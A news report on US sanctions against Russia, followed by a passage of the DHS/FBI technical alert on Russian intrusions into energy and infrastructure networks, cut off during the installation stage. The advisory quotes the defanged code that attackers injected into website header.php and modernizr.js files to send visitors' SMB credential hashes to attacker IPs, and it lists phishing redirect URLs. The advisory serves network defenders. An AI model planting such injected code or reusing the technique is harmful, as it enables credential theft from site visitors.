CERT/FBI Declaration Of Russia Hacking U.S. Infrastructure

US sanctions Russia for election interference, cyberattacks

The US government takes action against Russia for misdeeds including what it’s calling the “most destructive cyberattack in history.”

CNet: The White House has announced an array of sanctions against Russia for meddling in US elections and for broader hacking efforts, including one incident it called “most destructive and costly cyberattack in history.”

The US government unveiled the sanctions Thursday morning, saying they were prompted by Russia’s online propaganda campaign during the US elections, massive hacks of Yahoo and attempted cyberattacks against electrical grids in the US.

The government singled out Russia’s role in the NotPetya attack, a piece of malware that was disguised as ransomware but actually designed to destroy data. Last month, the Trump Administration attributed the attack to Russia, saying it caused billions of dollars in damage in Europe, Asia and the Americas.

“These targeted sanctions are a part of a broader effort to address the ongoing nefarious attacks emanating from Russia,” Treasury Secretary Steven Mnuchin said in a statement. The sanctions, he said, will “hold Russian government officials and oligarchs accountable for their destabilizing activities by severing their access to the US financial system.”

The sanctions come after an investigation by the Department of Homeland Security and the FBI.

The sanctions fall on 19 individuals and five Russian entities, including the Internet Research Agency, a trolling farm designed to meddle in the 2016 presidential election through divisive posts on social media. They also target Russia’s intelligence agency, known as the Federal Security Service or FSB, and the country’s military intelligence organization, the GRU.

The Russian embassy didn’t respond to a request for comment.

‘A long-overdue step’

On Capitol Hill, the sanctions fed into a continuing controversy over Russian meddling in American democratic processes.

“This is a welcome, if long-overdue, step by the Trump administration to punish Russia for interfering with the 2016 election,” Sen. Mark Warner, a Democrat from Virginia, said in a statement.

Still, the vice chairman of the Senate intelligence committee criticized the sanctions because they “do not go far enough,” pointing out that many of the named entities were either already sanctioned under the Obama administration or have been charged by the Justice Department.

“With the midterm elections fast approaching,” he said, “the Administration needs to step it up, if we have any hope of deterring Russian meddling in 2018.”

Senior national security officials said the FSB was directly involved in hacking millions of Yahoo accounts, while the GRU was behind the interference in the 2016 presidential election and the NotPetya cyberattack.

The sanctions fall under the Countering America’s Adversaries Through Sanctions Act, which authorizes pushback against “aggression by the governments of Iran, the Russian Federation and North Korea.”

Investigators found evidence of Russian attempts to hack into the US electric grid through spear-phishing tactics, senior national security officials said. The attacks have been going on since March 2016, targeting multiple US government offices, as well as energy, water, nuclear and critical manufacturing companies.

The DHS and the FBI provided details in a technical alert released Thursday, calling the actions a “multistage intrusion” through which Russian hackers were able to gain remote access into energy sector networks.

Systems Affected

• Domain Controllers
• File Servers
• Email Servers

Overview

This joint Technical Alert (TA) is the result of analytic efforts between the Department of Homeland Security (DHS) and the Federal Bureau of Investigation (FBI). This alert provides information on Russian government actions targeting U.S. Government entities as well as organizations in the energy, nuclear, commercial facilities, water, aviation, and critical manufacturing sectors. It also contains indicators of compromise (IOCs) and technical details on the tactics, techniques, and procedures (TTPs) used by Russian government cyber actors on compromised victim networks. DHS and FBI produced this alert to educate network defenders to enhance their ability to identify and reduce exposure to malicious activity.

DHS and FBI characterize this activity as a multi-stage intrusion campaign by Russian government cyber actors who targeted small commercial facilities’ networks where they staged malware, conducted spear phishing, and gained remote access into energy sector networks. After obtaining access, the Russian government cyber actors conducted network reconnaissance, moved laterally, and collected information pertaining to Industrial Control Systems (ICS).

For a downloadable copy of IOC packages and associated files, see:

• TA18-074A_TLP_WHITE.csv
• TA18-074A_TLP_WHITE.stix.xml
• MIFR-10127623_TLP_WHITE.pdf
• MIFR-10127623_TLP_WHITE_stix.xml
• MIFR-10128327_TLP_WHITE.pdf
• MIFR-10128327_TLP_WHITE_stix.xml
• MIFR-10128336_TLP_WHITE.pdf
• MIFR-10128336_TLP_WHITE_stix.xml
• MIFR-10128830­_TLP_WHITE.pdf
• MIFR-10128830­_TLP_WHITE_stix.xml
• MIFR-10128883_TLP_WHITE.pdf
• MIFR-10128883_TLP_WHITE_stix.xml
• MIFR-10135300_TLP_WHITE.pdf
• MIFR-10135300_TLP_WHITE_stix.xml

Contact DHS or law enforcement immediately to report an intrusion and to request incident response resources or technical assistance.

Description

Since at least March 2016, Russian government cyber actors—hereafter referred to as “threat actors”—targeted government entities and multiple U.S. critical infrastructure sectors, including the energy, nuclear, commercial facilities, water, aviation, and critical manufacturing sectors.

Analysis by DHS and FBI, resulted in the identification of distinct indicators and behaviors related to this activity. Of note, the report Dragonfly: Western energy sector targeted by sophisticated attack group, released by Symantec on September 6, 2017, provides additional information about this ongoing campaign. [1] (link is external)

This campaign comprises two distinct categories of victims: staging and intended targets. The initial victims are peripheral organizations such as trusted third-party suppliers with less secure networks, referred to as “staging targets” throughout this alert. The threat actors used the staging targets’ networks as pivot points and malware repositories when targeting their final intended victims. NCCIC and FBI judge the ultimate objective of the actors is to compromise organizational networks, also referred to as the “intended target.”

Technical Details

The threat actors in this campaign employed a variety of TTPs, including:

• spear-phishing emails (from compromised legitimate account),
• watering-hole domains,
• credential gathering,
• open-source and network reconnaissance,
• host-based exploitation, and
• targeting industrial control system (ICS) infrastructure.

Using Cyber Kill Chain for Analysis

DHS used the Lockheed-Martin Cyber Kill Chain model to analyze, discuss, and dissect malicious cyber activity. Phases of the model include reconnaissance, weaponization, delivery, exploitation, installation, command and control, and actions on the objective. This section will provide a high-level overview of threat actors’ activities within this framework.

Stage 1: Reconnaissance

The threat actors appear to have deliberately chosen the organizations they targeted, rather than pursuing them as targets of opportunity. Staging targets held preexisting relationships with many of the intended targets. DHS analysis identified the threat actors accessing publicly available information hosted by organization-monitored networks during the reconnaissance phase. Based on forensic analysis, DHS assesses the threat actors sought information on network and organizational design and control system capabilities within organizations. These tactics are commonly used to collect the information needed for targeted spear-phishing attempts. In some cases, information posted to company websites, especially information that may appear to be innocuous, may contain operationally sensitive information. As an example, the threat actors downloaded a small photo from a publicly accessible human resources page. The image, when expanded, was a high-resolution photo that displayed control systems equipment models and status information in the background.

Analysis also revealed that the threat actors used compromised staging targets to download the source code for several intended targets’ websites. Additionally, the threat actors attempted to remotely access infrastructure such as corporate web-based email and virtual private network (VPN) connections.

Stage 2: Weaponization

Spear-Phishing Email TTPs

Throughout the spear-phishing campaign, the threat actors used email attachments to leverage legitimate Microsoft Office functions for retrieving a document from a remote server using the Server Message Block (SMB) protocol. (An example of this request is: file[:]//<remote IP address>/Normal.dotm). As a part of the standard processes executed by Microsoft Word, this request authenticates the client with the server, sending the user’s credential hash to the remote server before retrieving the requested file. (Note: transfer of credentials can occur even if the file is not retrieved.) After obtaining a credential hash, the threat actors can use password-cracking techniques to obtain the plaintext password. With valid credentials, the threat actors are able to masquerade as authorized users in environments that use single-factor authentication. [2]

Use of Watering Hole Domains

One of the threat actors’ primary uses for staging targets was to develop watering holes. Threat actors compromised the infrastructure of trusted organizations to reach intended targets. [3] Approximately half of the known watering holes are trade publications and informational websites related to process control, ICS, or critical infrastructure. Although these watering holes may host legitimate content developed by reputable organizations, the threat actors altered websites to contain and reference malicious content. The threat actors used legitimate credentials to access and directly modify the website content. The threat actors modified these websites by altering JavaScript and PHP files to request a file icon using SMB from an IP address controlled by the threat actors. This request accomplishes a similar technique observed in the spear-phishing documents for credential harvesting. In one instance, the threat actors added a line of code into the file “header.php”, a legitimate PHP file that carried out the redirected traffic.

img src=”file[:]//62.8.193[.]206/main_logo.png” style=”height: 1px; width: 1px;”

In another instance, the threat actors modified the JavaScript file, “modernizr.js”, a legitimate JavaScript library used by the website to detect various aspects of the user’s browser. The file was modified to contain the contents below:

var i = document.createElement(“img”);

i.src = “file[:]//184.154.150[.]66/ame_icon.png”;

i.width = 3;

i.height=2;

Stage 3: Delivery

When compromising staging target networks, the threat actors used spear-phishing emails that differed from previously reported TTPs. The spear-phishing emails used a generic contract agreement theme (with the subject line “AGREEMENT & Confidential”) and contained a generic PDF document titled “document.pdf. (Note the inclusion of two single back ticks at the beginning of the attachment name.) The PDF was not malicious and did not contain any active code. The document contained a shortened URL that, when clicked, led users to a website that prompted the user for email address and password. (Note: no code within the PDF initiated a download.)

In previous reporting, DHS and FBI noted that all of these spear-phishing emails referred to control systems or process control systems. The threat actors continued using these themes specifically against intended target organizations. Email messages included references to common industrial control equipment and protocols. The emails used malicious Microsoft Word attachments that appeared to be legitimate résumés or curricula vitae (CVs) for industrial control systems personnel, and invitations and policy documents to entice the user to open the attachment.

Stage 4: Exploitation

The threat actors used distinct and unusual TTPs in the phishing campaign directed at staging targets. Emails contained successive redirects to http://bit[.]ly/2m0x8IH link, which redirected to http://tinyurl[.]com/h3sdqck link, which redirected to the ultimate destination of http://imageliners[.]com/nitel. The imageliner[.]com website contained input fields for an email address and password mimicking a login page for a website.

When exploiting the intended targets, the threat actors used malicious .docx files to capture user credentials. The documents retrieved a file through a “file://” connection over SMB using Transmission Control Protocol (TCP) ports 445 or 139. This connection is made to a command and control (C2) server—either a server owned by the threat actors or that of a victim. When a user attempted to authenticate to the domain, the C2 server was provided with the hash of the password. Local users received a graphical user interface (GUI) prompt to enter a username and password, and the C2 received this information over TCP ports 445 or 139. (Note: a file transfer is not necessary for a loss of credential information.) Symantec’s report associates this behavior to the Dragonfly threat actors in this campaign. [1] (link is external)

Stage 5: Installation

The threat actors leveraged compromised credentials to access victims’ networks where multi-factor authentication was not used. [4] To maintain persistence, the threat actors created local administrator accounts within staging targets and placed malicious files within intended targets.

Establishing Local Accounts